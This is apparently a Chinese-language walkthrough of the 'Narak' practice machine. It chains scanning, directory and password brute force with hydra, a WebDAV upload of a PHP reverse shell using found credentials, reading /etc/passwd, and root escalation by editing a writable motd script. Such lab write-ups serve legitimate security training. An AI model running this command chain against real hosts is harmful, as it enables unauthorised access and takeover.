鹰眼模式推荐枪(Narak靶机笔记)
目标IP:192.168.3.134
发现开放的端口
sudo nmap -p- 192.168.3.134
探索端口的拥有的路径
gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.3.134
webdav账号密码登录
在这里发现弹出来了一个账号密码的登录窗口,使用cewl生成语义化的字典
cewl http::/192.168.3.134 -w dict.txt
然后尝试破解密码
hydra -L dict.txt -P dict.txt 192.168.3.134 http-get /webdav -v
上传文件到FTP
davtest -url http://192.168.3.134/webdav -auth yamdoot:Swarg
至此可以知道可以上传shell脚本到远程的FTP服务
davtest -url http://192.168.3.134/webdav -auth yamdoot:Swarg -uploadfile php-reverse-shell.php -uploadl.php
探索靶机
find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null
发现一个脚本,解密得到: chitragupt
利用 cat /etc/passwd 得到另一个用户: inferno
发现该系统上有三个账户,为了得到好用的shell操作环境那么:ssh inferno@192.168.3.134,继续查找root权限且当前用户可写的文件
find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null
nano /etc/update-motd.d/00-header
google得到这个文件的作用:Forbidden - Stack Exchange
修改欢迎语,重新登录
DONE
,免责声明:本文仅代表文章作者的个人观点,与本站无关。其原创性、真实性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容文字的真实性、完整性和原创性本站不作任何保证或承诺,请读者仅作参考,并自行核实相关内容。文章投诉邮箱:anhduc.ph@yahoo.com